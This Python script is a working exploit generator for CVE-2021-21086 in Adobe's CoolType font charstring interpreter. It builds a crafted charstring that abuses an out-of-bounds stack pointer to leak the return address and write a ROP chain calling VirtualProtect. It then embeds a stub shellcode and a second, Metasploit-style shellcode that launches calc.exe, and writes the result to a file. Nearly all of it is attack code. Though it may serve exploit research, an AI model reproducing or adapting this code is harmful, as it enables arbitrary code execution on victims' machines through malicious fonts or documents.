import argparse
import binascii
import struct

class Stack():
    """
    A simple class to model the operand stack and part of the call stack.
    """

    ptr = 0
    opStackLast = 47                # Last valid position of the operand stack
    ret = 74                        # Return address position
    stack = [None] * (ret + 50)
    stack[74] = 0x6F6E72F4          # Hardcoded return address to test gadgets
    
    def push(self, n):
        assert self.ptr >= 0 and self.ptr < len(self.stack)
        self.stack[self.ptr] = n
        self.ptr += 1

    def pop(self):
        self.ptr -= 1
        assert self.ptr >= 0 and self.ptr < len(self.stack)
        return self.stack[self.ptr]

    def advancePtr(self, n):
        """
        This method allows to advance the stack pointer outside the operand stack boundaries to recreate the bug described in cve-2021-21086.
        """
        assert (self.ptr + n) < len(self.stack)
        self.ptr += n

    def isOut(self):
        return self.ptr > self.opStackLast
    
    def printStatus(self):
        print("Ptr: {}".format(self.ptr))
        if self.isOut():
            print("Ptr out of OpStack")
        else:
            print("Ptr in OpStack")
        print("Ptr - Ret: {}".format(self.ptr - self.ret))
        print("---------------------------------------------------------------------")

    def print(self):
        print("Stack")
        print([(i, hex(v)) if v is not None else (i, v) for i, v in enumerate(self.stack)])
        print("---------------------------------------------------------------------")


class TransientArray():
    """
    A simple class to model the transient array.
    """

    array = [None] * 32
    
    def put(self, i, n):
        assert i >= 0 and i < 32
        self.array[i] = n
    
    def get(self, i):
        assert i >= 0 and i < 32
        return self.array[i]

    def print(self):
        print("Transient Array")
        print([(i, hex(v)) if v is not None else (i, v) for i, v in enumerate(self.array)])
        print("---------------------------------------------------------------------")

class Cooltype():
    """
    This class to models the charstring interpreter including the operations relevant for the exploit.
    It simulates each operation effect on the stack and the transient array and stores their corresponding opcode.
    It also implements a four dword write primitive to ease the exploit development.
    """
    charstring = bytearray()

    def __init__(self):
        self.stack = Stack()
        self.transientArray = TransientArray()

    def printCharstring(self):
        print("Charstring:")
        print(binascii.hexlify(self.charstring))
        print("---------------------------------------------------------------------")

    def write(self, n):
        assert not self.stack.isOut()
        self.stack.push(n)

        if n <= 107:
            self.charstring.append(n + 0x8B)
        else:
            self.charstring.append(0xFF)
            self.charstring += bytearray(n.to_bytes(4, "big"))
    
    def put(self):
        i = self.stack.pop()
        n = self.stack.pop()
        self.transientArray.put(i, n)

        self.charstring.append(0x0c)
        self.charstring.append(0x14)

    def get(self):
        i = self.stack.pop()
        n = self.transientArray.get(i)
        self.stack.push(n)

        self.charstring.append(0x0c)
        self.charstring.append(0x15)

    def notOp(self):
        n = self.stack.pop()
        if n == 0:
            self.stack.push(1)
        else:
            self.stack.push(0)

        self.charstring.append(0x0c)
        self.charstring.append(0x05)

    def callOther(self):
        i = self.stack.pop()
        assert i == 18
        self.stack.advancePtr(5)

        self.charstring.append(0x0c)
        self.charstring.append(0x10)

    def drop(self):
        self.stack.pop()

        self.charstring.append(0x0c)
        self.charstring.append(0x12)

    def neg(self):
        n = self.stack.pop()
        self.stack.push(-n)

        self.charstring.append(0x0c)
        self.charstring.append(0x0e)

    def exch(self):
        a = self.stack.pop()
        b = self.stack.pop()
        self.stack.push(a)
        self.stack.push(b)

        self.charstring.append(0x0c)
        self.charstring.append(0x1c)

    def sub(self):
        a = self.stack.pop()
        b = self.stack.pop()
        self.stack.push(b-a)

        self.charstring.append(0x0c)
        self.charstring.append(0x0b)

    def add(self):
        a = self.stack.pop()
        b = self.stack.pop()
        self.stack.push(b+a)

        self.charstring.append(0x0c)
        self.charstring.append(0x0a)
    
    def dup(self):
        n = self.stack.pop()
        self.stack.push(n)
        self.stack.push(n)

        self.charstring.append(0x0c)
        self.charstring.append(0x1b)

    def endchar(self):
        self.charstring.append(0x0e)

    def writeFourDwords(self, offsetFromRet, firstIndex):
        """
        Write primitive that exploits cve-2021-21086 to copy four consecutive dwords from the transient array to an offset from the return address.
        After writing, it returns the operand stack pointer to its orginal position.
        It has the side effect of writing 0x00120000 at some positions while it advances the pointer out of the operand stack due to the nature of the bug being exploited.
        """
        firstOffset = self.stack.ret + offsetFromRet
        ptrInStack = self.stack.ptr

        # transientArray[18] = firstIndex + 3 (To generate indices)
        self.write(firstIndex + 3)
        self.write(18)
        self.put()

        # Advance the pointer to the last offset
        while self.stack.ptr < firstOffset + 4:
            self.notOp()
            self.get()
            self.callOther()

        while self.stack.ptr > firstOffset + 4:
            self.drop()

        # Get last index and generate some ones
        self.notOp()
        self.get()
        self.get()
        self.drop()

        for j in range(3):
            self.notOp()
            self.get()
            self.get()
            self.notOp()
            self.notOp()
            self.drop()

        # Advance the pointer to the last offset
        while self.stack.ptr < firstOffset + 4:
            self.notOp()
            self.get()
            self.callOther()

        while self.stack.ptr > firstOffset + 4:
            self.drop()

        # Substract to generate the remaining indices
        for j in range(3):
            self.sub()
            self.neg()
        c.drop()

        # Advance the pointer to the last offset
        while self.stack.ptr < firstOffset + 4:
            self.notOp()
            self.get()
            self.callOther()

        while self.stack.ptr > firstOffset + 4:
            self.drop()

        # Get the elements from the transient array
        for j in range(4):
            self.get()
            self.drop()

        # Restore the pointer to its original position
        while self.stack.ptr != ptrInStack:      
            self.drop()

if __name__ == "__main__":
    ap = argparse.ArgumentParser()
    ap.add_argument("-o", "--output", help='Output filename.')
    args = vars(ap.parse_args())
    
    c = Cooltype()
    # transientArray[0] = 18 & transientArray[1] = 18
    c.write(18)
    c.write(18)
    c.write(0)
    c.put()
    c.write(1)
    c.put()

    # Advance pointer to return address + 2
    for i in range(32):
        c.write(0)

    while c.stack.ptr < c.stack.ret + 2:
        c.notOp()
        c.get()
        c.callOther()

    # Check position to leak return address
    assert c.stack.ptr == c.stack.ret + 2

    # Copy return address to transientArray[18]
    c.notOp()
    c.get()
    c.put()

    # Go back to the operand stack to assemble the ropchain
    # without crashing the interpreter
    while c.stack.ptr > 30:
        c.drop()

    # Put the return address on the operand stack
    c.write(18)
    c.get()

    # Substract its own offset + 0x10000000
    # This ensures the gadget offsets are handled correctly
    # by the interpreter because it shifts small numbers
    c.write(0x100472F4)
    c.sub()
    c.dup()

    # Assemble de ropchain adding each gadget address
    # plus 0x10000000

    # transientArray[2] = POP EAX/RETN
    c.dup()
    c.write(0x10178151)
    c.add()
    c.write(2)
    c.put()

    # transientArray[3] = part of jump to first shellcode
    c.write(0xFFFF33E9)
    c.write(3)
    c.put()

    # transientArray[4] = RETN
    c.dup()
    c.write(0x1000100D)
    c.add()
    c.write(4)
    c.put()

    # transientArray[5] = JMP [VirtualProtect]
    c.dup()
    c.write(0x101C5C3B)
    c.add()
    c.write(5)
    c.put()

    # transientArray[6] = 0x321; length
    c.write(0x10000321)
    c.write(0x10000000)
    c.sub()
    c.write(6)
    c.put()

    # transientArray[7] = JMP ESP
    c.dup()
    c.write(0x10005135)
    c.add()
    c.write(7)
    c.put()

    # transientArray[8] = POP EDX/RETN
    c.dup()
    c.write(0x1014534E)
    c.add()
    c.write(8)
    c.put()

    # transientArray[9] = 0x40; PAGE_EXECUTE_READ_WRITE
    c.write(0x10000040)
    c.write(0x10000000)
    c.sub()
    c.write(9)
    c.put()

    # transientArray[10] = POP ECX/RETN
    c.dup()
    c.write(0x1000103A)
    c.add()
    c.write(10)
    c.put()

    # transientArray[11] = .data section for oldProtect
    c.dup()
    c.write(0x102B8688)
    c.add()
    c.write(11)
    c.put()

    # transientArray[12] = PUSHAD/RETN
    c.dup()
    c.write(0x1015CF90)
    c.add()
    c.write(12)
    c.put()

    # transientArray[13] = part of jump to first shellcode
    c.write(0x100000FF)
    c.write(0x10000000)
    c.sub()
    c.write(13)
    c.put()

    # First shellcode
    shellcode =  b""
    shellcode += b"\x8B\xBC\x24\xB4\x03\x00\x00\xB8\xEF\xBE\xAD\xDE\xAF"
    shellcode += b"\x75\xFD\x8B\xF7\x8B\xFC\x90\xB9\x00\xFF\xFF\xFF\xF7"
    shellcode += b"\xD9\xF3\xA5\xFF\xE4"

    # transientArray[14:18] = First shellcode
    for i in range(14, 18):
        shellcodeChunk = int.from_bytes(shellcode[4*(i-14):4*(i-14)+4], byteorder='little', signed=False)
        c.write(shellcodeChunk)
        c.write(i)
        c.put()

    # transientArray[19:32] = First shellcode
    for i in range(19, 23):
        shellcodeChunk = int.from_bytes(shellcode[4*(i-15):4*(i-15)+4], byteorder='little', signed=False)
        c.write(shellcodeChunk)
        c.write(i)
        c.put()

    # Use a four dword write primitive to copy the transient
    # array content to the locations needed for the exploit
    # to work   
    offsets = [-40, -36, 0, 4, 8]
    indices = [14, 19, 2, 6, 10]

    for o,i in reversed(list(zip(offsets, indices))):
        c.writeFourDwords(o, i)

    c.endchar()

    shellcode2 =  b""
    shellcode2 += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
    shellcode2 += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
    shellcode2 += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
    shellcode2 += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
    shellcode2 += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
    shellcode2 += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
    shellcode2 += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
    shellcode2 += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
    shellcode2 += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
    shellcode2 += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
    shellcode2 += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
    shellcode2 += b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
    shellcode2 += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
    shellcode2 += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
    shellcode2 += b"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"

    padding = bytearray(b"A" *(4 - len(c.charstring) % 4))

    finalCharstring = c.charstring + padding + bytearray(b"\xEF\xBE\xAD\xDE") + shellcode2

    c.transientArray.print()
    c.stack.print()
    c.stack.printStatus()

    if args['output']:
        with open(args['output'], "wb") as f:
            f.write(finalCharstring)
    else:
        c.printCharstring()


